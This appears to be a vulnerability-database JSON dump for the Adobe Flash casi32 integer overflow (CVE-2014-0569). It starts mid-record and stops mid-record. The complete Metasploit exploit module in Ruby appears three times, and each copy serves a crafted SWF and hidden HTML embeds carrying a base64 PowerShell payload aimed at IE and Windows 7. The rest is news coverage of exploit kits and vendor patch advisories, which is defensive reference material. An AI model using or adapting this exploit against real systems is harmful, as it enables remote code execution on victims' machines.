The vulnerability occurs in \nthe casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as \ndomainMemory for the current application domain. This module has been tested successfully \non Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'bilou', # Vulnerability discovery \n'juan vazquez' # msf module \n], \n'References' => \n[ \n['ZDI', '14-365'], \n['CVE', '2014-0569'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'], \n['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => 'win', \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => OperatingSystems::Match::WINDOWS_7, \n:ua_name => Msf::HttpClients::IE, \n:flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' }, \n:arch => ARCH_X86 \n}, \n'Targets' => \n[ \n[ 'Automatic', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 14 2014', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \npsh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) \nb64_payload = Rex::Text.encode_base64(psh_payload) \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" 
codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/131382/adobe_flash_casi32_int_overflow.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-04T04:14:25", "bulletinFamily": "exploit", "description": "Adobe Flash Player casi32 Integer Overflow. CVE-2014-0569. Remote exploit for windows platform", "modified": "2015-04-13T00:00:00", "published": "2015-04-13T00:00:00", "id": "EDB-ID:36744", "href": "https://www.exploit-db.com/exploits/36744/", "type": "exploitdb", "title": "Adobe Flash Player casi32 Integer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\r\n 'Description' => %q{\r\n This module exploits an integer overflow in Adobe Flash Player. 
The vulnerability occurs in\r\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\r\n domainMemory for the current application domain. This module has been tested successfully\r\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['ZDI', '14-365'],\r\n ['CVE', '2014-0569'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n 
html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36744/"}], "threatpost": [{"lastseen": "2018-10-06T22:57:52", "bulletinFamily": "info", "description": "Adobe pushed out security updates for Flash Player this afternoon, addressing 18 different vulnerabilities, all critical, that could allow an attacker to take control of an affected system running the multimedia platform according to a [security bulletin posted today](<http://helpx.adobe.com/security/products/flash-player/apsb14-24.html>).\n\nThe Patch Tuesday updates, available for Windows, Macintosh, and Linux machines, remedy vulnerabilities in several builds of Flash Player and AIR, Adobe\u2019s run-time system.\n\nThe lion\u2019s share of the vulnerabilities \u2013 15 of the 18 \u2013 a use-after-free, double free, memory corruption, type confusion and buffer overflow vulnerability, could lead to code execution if left unpatched. 
Other vulnerabilities patched include issues that could trigger session tokens to be disclosed, and cause privilege escalation.\n\nResearchers with Google Project Zero, the Chromium Rewards Project, Microsoft, and several other firms dug up the vulnerabilities.\n\nAdobe is urging users running older versions of Flash Player (15.0.0.189 and earlier, 13.0.0.250 and earlier 13.x versions, 11.2.202.411 and earlier for Linux) and older versions of AIR (15.0.0.293 and earlier, SDK 15.0.0.302 and earlier, SDK & Compiler 15.0.0.302 and earlier, 15.0.0.293 and earlier for Android) to update as soon as possible.\n\nIn October, one week after Adobe pushed its [last handful of patches for Flash](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), attackers began bundling one of the fixed vulnerabilities (CVE-2014-0569) into the Fiesta exploit kit. Independent malware researcher Kafeine [wrote at the time](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) that it was a \u201creally fast integration\u201d into an exploit kit and that whoever coded it must have reversed the patch in two days. 
It remains to be seen whether any of the 18 vulnerabilities that were fixed today are either currently being exploited in the wild or if they\u2019ll eventually be incorporated into a future exploit kit.\n", "modified": "2014-11-17T15:58:02", "published": "2014-11-11T14:54:39", "id": "THREATPOST:FF33896826D8E265964D6C8BDFB7FEEA", "href": "https://threatpost.com/adobe-patches-18-vulnerabilities-in-flash/109300/", "type": "threatpost", "title": "Adobe Patches 18 Vulnerabilities in Flash", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:58", "bulletinFamily": "info", "description": "Two notorious exploit kits are already seeding vulnerable websites with exploits for a Flash Player vulnerability that was patched in last week\u2019s [Adobe security bulletin](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>).\n\nFrench researcher [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) told Threatpost that the most likely scenario is that a skilled coder found a way to reverse-engineer the Adobe patch in order to build the exploit. Regardless, a week from patch to inclusion in an exploit kit\u2014in this case the Angler and Fiesta EKs\u2014is a harsh reminder of how quickly the window from vulnerability to exploit can slam shut.\n\n\u201cThis is really, really fast,\u201d Kafeine said. \u201cThe best I remember was maybe three weeks in February 2014.\u201d\n\nKafeine was referring to CVE-2014-0497, another Flash exploit integrated into the Angler Exploit Kit that prompted an [emergency patch](<http://threatpost.com/emergency-adobe-update-patches-flash-zero-day/104044>) from Adobe on Feb. 4. 
Those exploits were dropping a password-grabbing Trojan targeting Chinese email and social media accounts, likely from an isolated campaign, said researchers from Kaspersky Lab at the time.\n\nLast week\u2019s patch addressed an [integer overflow vulnerability](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>) that could lead to code execution. An alert from Cisco said the bug is found in the casi32 implementation used by Flash.\n\n\u201cAn unauthenticated, remote attacker could exploit this vulnerability by persuading a user to visit a malicious web page that contains crafted Flash content,\u201d the [advisory](<http://tools.cisco.com/security/center/viewAlert.x?alertId=36094>) said. \u201cIf successful, the attacker could execute arbitrary code in the security context of the affected application. If the application is running with elevated privileges, this could result in a complete system compromise.\u201d\n\nFiesta and Angler are among a menu of exploit kits available on underground forums and used in campaigns to own websites and redirect victims off to sites hosting banking malware and other types of malicious code. Most recently, malicious ads from online ad network AppNexus were found on heavily trafficked websites such as TMZ. The [malvertising campaigns](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) used exploits in the Angler kit to infect visitors with malware by redirecting them from the host site to a third-party site, where additional attacks were carried out.\n\nIn addition to Flash and Java exploits, Angler has also been spreading [exploits for bugs in Microsoft Silverlight](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>), a plug-in similar to Flash for streaming media. 
Silverlight is most well known for being used in the Netflix streaming service.\n\nAngler and Fiesta are among the potential successors to the [Blackhole Exploit Kit](<http://threatpost.com/blackhole-exploit-kit-author-arrested-in-russia/102537>), which virtually disappeared after its creator, a Russian hacker known as Paunch, was arrested.\n", "modified": "2014-10-27T20:29:54", "published": "2014-10-22T15:18:42", "id": "THREATPOST:C556A86F578A25714343E05BBFC4D7DD", "href": "https://threatpost.com/exploit-for-patched-flash-vulnerability-already-in-two-exploit-kits/108972/", "type": "threatpost", "title": "New Adobe Flash Exploit Found in Angler, Fiesta EKs", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:44", "bulletinFamily": "info", "description": "Adobe is expected to update its Reader and Acrobat software next Tuesday as part of its scheduled security updates, and the updates will, according to an Adobe spokesperson, include patches for a [Reader vulnerability disclosed this week by Google\u2019s Project Zero](<http://threatpost.com/sandbox-escape-bug-in-adobe-reader-disclosed/109637>).\n\nResearcher James Forshaw, a well-known bug-hunter and Project Zero member, went public with details of a sandbox escape vulnerability in Reader as well as exploit code.\n\nPer its policy, Google\u2019s security research team discloses vulnerability details 90 days after it shares those details with the vendor in question. In this case, the vulnerability was partially addressed earlier by Adobe after it was reported in August. Adobe tweaked Reader in order to make exploiting the vulnerability much more difficult. 
The flaw, however, had not been patched.\n\nIn a pre-notification [advisory](<http://helpx.adobe.com/security/products/reader/apsb14-28.html>) published yesterday afternoon, Adobe said it will release a security update for Adobe Reader 11.0.09 and earlier, and 10.1.12 and earlier, as well as Acrobat 11.0.09 and earlier, and Acrobat 10.1.12 and earlier.\n\nForshaw said the vulnerability is a race condition in the handling of the MoveFileEx call hook in Adobe Reader.\n\n\u201cThis race can be won by the sandboxed process by using an OPLOCK to wait for the point where the MoveFileEx function opens the original file for the move. This allows code in the sandbox to write an arbitrary file to the file system,\u201d Forshaw wrote in the [Project Zero bug report](<https://code.google.com/p/google-security-research/issues/detail?id=103>).\n\nAdobe\u2019s adjustment to Reader in version 11.0.9 prevented the vulnerability from using the broker file system hooks to create directory junctions, Forshaw said.\n\nForshaw\u2019s disclosure came a week after Adobe released an [emergency security update for Flash Player](<http://threatpost.com/adobe-releases-emergency-flash-player-patch/109623>).\n\nThe Nov. 25 update patched a code-execution vulnerability in Flash that was already being exploited in the Angler and Nuclear exploit kits, French researcher [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) discovered. Adobe thought it had patched the issue in question with its [October security updates](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>) that addressed three memory-corruption vulnerabilities. 
The emergency patch resolved a fourth, CVE-2014-8439.\n\n\u201cThese updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,\u201d Adobe said in its advisory.\n", "modified": "2014-12-05T16:14:32", "published": "2014-12-05T09:19:13", "id": "THREATPOST:51AE17332E02AA24542CD19B500F69C3", "href": "https://threatpost.com/upcoming-adobe-reader-acrobat-update-to-patch-sandbox-escape/109738/", "type": "threatpost", "title": "December 2014 Adobe Reader, Acrobat Security Patches", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:47", "bulletinFamily": "info", "description": "Adobe today revised a [security bulletin](<http://helpx.adobe.com/security/products/flash-player/apsb14-26.html>) it released more than a month ago, adding a patch for a code-execution vulnerability in Flash Player already included in some [exploit kits](<https://threatpost.com/exploit-for-patched-flash-vulnerability-already-in-two-exploit-kits/108972>).\n\nFrench researcher Kafeine found the exploits in the Angler and Nuclear kits less than a week after [Adobe released an update Oct. 14](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>).\n\nThe update addressed three CVEs, all of which could lead to memory corruption or integer overflows, enabling attackers to remotely load and execute code on the compromised computer. 
Today\u2019s patch adds CVE-2014-8439, reported by [Kafeine](<http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html>) to Adobe.\n\n\u201cThese updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,\u201d Adobe said today in its advisory.\n\nFiesta and Angler are used to compromise vulnerable websites and redirect site visitors to sites hosting banking malware, [malvertising schemes](<http://threatpost.com/java-com-tmz-serving-malvertising-redirects-to-angler-exploit-kit/107943>) and other attacks. Flash Player bugs are among the most common vulnerabilities exploited by such kits, as well as Java and [Microsoft Silverlight vulnerabilities](<http://threatpost.com/netflixers-beware-angler-exploit-kit-targets-silverlight-vulnerability/102968>).\n\nThe inclusion of the Oct. 14 CVEs in the exploit kits was worrisome to Kafeine, who does extensive research into these attack tools, noting that an attacker likely found a way to reverse-engineer the Adobe patch in order to drop it in the EK inside of a week.\n\nKafeine said that the Adobe patches released on Oct. 14 likely protected users from the active exploits, but the vulnerability remained exposed to future exploit development.\n\nToday\u2019s update moves Flash Player to version 15.0.0.239 for Windows and Macintosh users, and 11.2.202.424 for Linux users. Chrome and Internet Explorer users will be updated automatically by Google and Microsoft respectively.\n\nAnother [Adobe exploit in Angler](<http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498>) was reported last week, also by Kafeine.\n\nThis vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. 
The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers.\n\n\u201cThe vulnerability is being exploited in blind mass attack. No doubt about it : the team behind Angler is really good at what it does,\u201d he said in a blog [post](<http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html>).\n", "modified": "2014-11-26T16:22:52", "published": "2014-11-25T13:22:26", "id": "THREATPOST:D2E078B72EFC850200253645E789C5C2", "href": "https://threatpost.com/adobe-releases-emergency-flash-player-patch/109623/", "type": "threatpost", "title": "Adobe Releases Emergency Flash Player Patch", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "bulletinFamily": "info", "description": "Microsoft and Adobe issued their monthly patch Tuesday releases today, and Microsoft posted eight bulletins, three of which are considered critical including the now-monthly cumulative Internet Explorer update, addressing 24 vulnerabilities in various products. 
Adobe has fixes for three vulnerabilities in both its Flash Player and ColdFusion lines.\n\n[The Microsoft patches](<https://technet.microsoft.com/library/security/ms14-oct>), which were plentiful despite last month\u2019s announcement that the company was [shuttering its Trustworthy Computing Group](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>), resolve vulnerabilities in Windows, Internet Explorer, the .NET Framework, Developer Tools, Office, Office Services and Web Apps.\n\nPatching priority should be given to MS14-058, a vulnerability in a kernel mode driver that could enable remote code execution, according to Russ Ernst of Lumension.\n\nMS14-058 actually resolves two privately reported bugs, the more serious of which could give an attacker the ability to remotely execute code if a user opened a specially crafted document or visited an untrusted website containing embedded TrueType fonts.\n\nErnst notes that \u201cthis is under active attack and is applicable to all shipping versions of Windows, including the Server Core installations of Windows Server 2008 and Windows Server 2012, so it should be patched quickly.\u201d\n\nSecond priority, Ernst says, is the cumulative Internet Explorer update, which resolves 14 privately reported vulnerabilities, the most severe of which could be exploited to execute code remotely if the user opens a specially crafted webpage with Internet Explorer.\n\n\u201cThird on your priority list is the final critical bulletin this month, MS14-057. It covers vulnerabilities in the .NET framework that could allow a remote code execution,\u201d Ernst claims. 
\u201cThe vulnerabilities addressed in this bulletin were privately disclosed and there are no known active attacks.\u201d\n\nThe remaining bulletins from Microsoft \u2013 all important rated \u2013 consist of a vulnerability in ASP.net MVC that could allow for an attacker to bypass security features, a remote code execution bug in Windows OLE\u2013which is the zero day used by the [Sandworm APT](<https://threatpost.com/sandworm-apt-team-found-using-windows-zero-day-vulnerability/108815>) team\u2013another remote code execution issue in Microsoft Word and Office Web Apps, a privilege escalation problem in Message Queuing Service and another privilege escalation issue in the FAT32 disk partition driver.\n\nOn to Adobe:\n\nThis patch Tuesday is primarily a [Flash Player](<http://helpx.adobe.com/security/products/flash-player/apsb14-22.html>) affair with security updates for Adobe Flash Player for Windows, Macintosh and Linux, which seal off holes that could potentially have given attackers the capacity to take control of the affected system.\n\nFor that reason, four of the nine bugs addressed by the three CVEs here received Adobe\u2019s highest priority rating. 
So, users of Flash Player desktop runtime for Windows and Mac should update to version 15.0.0.189 immediately; users of the Flash Player Extended Support Release should update to version 13.0.0.250; and Flash Player installed with Google Chrome, Internet Explorer 10 and Internet Explorer 11 will be automatically updated to the current versions.\n\nThe remaining bugs are not nearly as critical, but Adobe is still urging users of Flash Player for Linux to update to version 11.2.202.411; users of the AIR desktop runtime should update to version 15.0.0.293; users of the AIR SDK and AIR SDK & Compiler should update to version 15.0.0.302; and users of AIR for Android should update to Adobe AIR 15.0.0.293.\n\nAdobe gives credit to Ian Beer of Google Project Zero for CVE-2014-0558, Wen Guanxing from Venustech ADLAB for CVE-2014-0564 and bilou working with HP\u2019s Zero Day Initiative for CVE-2014-0569.\n\nAffected products include: Adobe Flash Player 15.0.0.167 and earlier versions, 13.0.0.244 and earlier 13.x versions, 11.2.202.406 and earlier versions for Linux, Adobe AIR desktop runtime 15.0.0.249 and earlier versions as well as the AIR SDK 15.0.0.249 and earlier versions and Compiler 15.0.0.249 and earlier versions and AIR 15.0.0.252 and earlier versions for Android.\n\nThe [ColdFusion](<http://helpx.adobe.com/security/products/coldfusion/apsb14-23.html#table>) patches are actually hotfixes resolving a series of moderately rated permissions issues and a few cross-site scripting and cross-site request forgery vulnerabilities. 
The permission problems could be exploited by an unauthenticated local user to bypass Internet protocol address access control restrictions applied to ColdFusion admins.\n\nAll of these patches, in versions 11 (fixed by update two), 10 (fixed by update 14), 9.0.2 (fixed by update 7), 9.0.1 (fixed by update 12) and 9.0 (fixed by update 13), are given level two severity ratings, meaning they resolve bugs in important products, but that there are currently no in-the-wild attacks.\n\nAdobe credits Craig Young of Tripwire VERT for CVE-2014-0570, Pete Freitag for CVE-2014-0571 and Aaron Foote for CVE-2014-0572.\n", "modified": "2014-10-16T14:47:10", "published": "2014-10-14T15:02:06", "id": "THREATPOST:2B0F6242C9EF7ABD2CC3142F2254E2A3", "href": "https://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838/", "type": "threatpost", "title": "Fixes for IE, Flash Player in October Patch Tuesday Release", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-04-04T15:33:49", "bulletinFamily": "exploit", "description": "This Metasploit module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. 
This Metasploit module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.", "modified": "2015-04-12T00:00:00", "published": "2015-04-12T00:00:00", "id": "1337DAY-ID-23503", "href": "https://0day.today/exploit/description/23503", "type": "zdt", "title": "Adobe Flash Player casi32 Integer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player casi32 Integer Overflow',\r\n 'Description' => %q{\r\n This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in\r\n the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as\r\n domainMemory for the current application domain. 
This module has been tested successfully\r\n on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['ZDI', '14-365'],\r\n ['CVE', '2014-0569'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^15\\./ && ver == '15.0.0.167' },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" 
codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23503"}], "suse": [{"lastseen": "2016-09-04T11:49:45", "bulletinFamily": "unix", "description": "This update fixes multiple code execution vulnerabilities in flash-player\n (APSB14-22). 
CVE-2014-0564, CVE-2014-0558 and CVE-2014-0569 have been\n assigned to this issue.\n\n Security Issues:\n\n * CVE-2014-0569\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0569>\n * CVE-2014-0564\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0564>\n * CVE-2014-0558\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0558>\n", "modified": "2014-11-05T19:04:50", "published": "2014-11-05T19:04:50", "id": "SUSE-SU-2014:1360-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00002.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "description": "Adobe Flash Player was updated to 11.2.202.411, fixing security issues and\n bugs.\n\n For more information please read:\n http://helpx.adobe.com/security/products/flash-player/apsb14-22.html\n\n", "modified": "2014-11-13T17:05:02", "published": "2014-11-13T17:05:02", "id": "SUSE-SU-2014:1423-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00014.html", "type": "suse", "title": "Security update for flash-player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the 
wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": 